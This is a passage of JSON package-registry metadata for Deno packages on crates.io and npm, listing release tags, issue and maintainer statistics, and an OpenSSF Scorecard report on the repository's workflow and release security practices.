.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T08:40:15.220Z","dependent_packages_count":0,"downloads":63226,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":93.9034716342083,"dependent_repos_count":20.036208255871674,"dependent_packages_count":26.516707384732186,"stargazers_count":0.029197932786358724,"forks_count":0.045743428031962005,"docker_downloads_count":null,"average":28.106265727126093},"purl":"pkg:cargo/deno_bundle_runtime","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_bundle_runtime","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_bundle_runtime","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_bundle_runtime/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bundle_runtime/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-09-12T08:12:34.131Z","updated_at":"2025-09-12T08:12:34.131Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"96431","login":"littledivy","name":"Divy Srivastava","email":null,"url":"https://github.com/littledivy","packages_count":37,"html_url":"https://crates.io/users/littledivy","role":null,"created_at":"2025-09-12T08:12:34.239Z","updated_at":"2025-09-12T08:12:34.239Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/littledivy/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-09-12T08:12:34.542Z","updated_at":"2025-09-12T08:12:34.542Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11161877,"name":"@deno/linux-x64-glibc","ecosystem":"npm","description":"linux-x64-glibc distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:25:36.449Z","latest_release_published_at":"2026-08-27T17:36:19.281Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:53:48.593Z","created_at":"2024-12-12T22:00:15.576Z","updated_at":"2026-09-07T22:53:48.593Z","registry_url":"https://www.npmjs.com/package/@deno/linux-x64-glibc","install_command":"npm install @deno/linux-x64-glibc","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 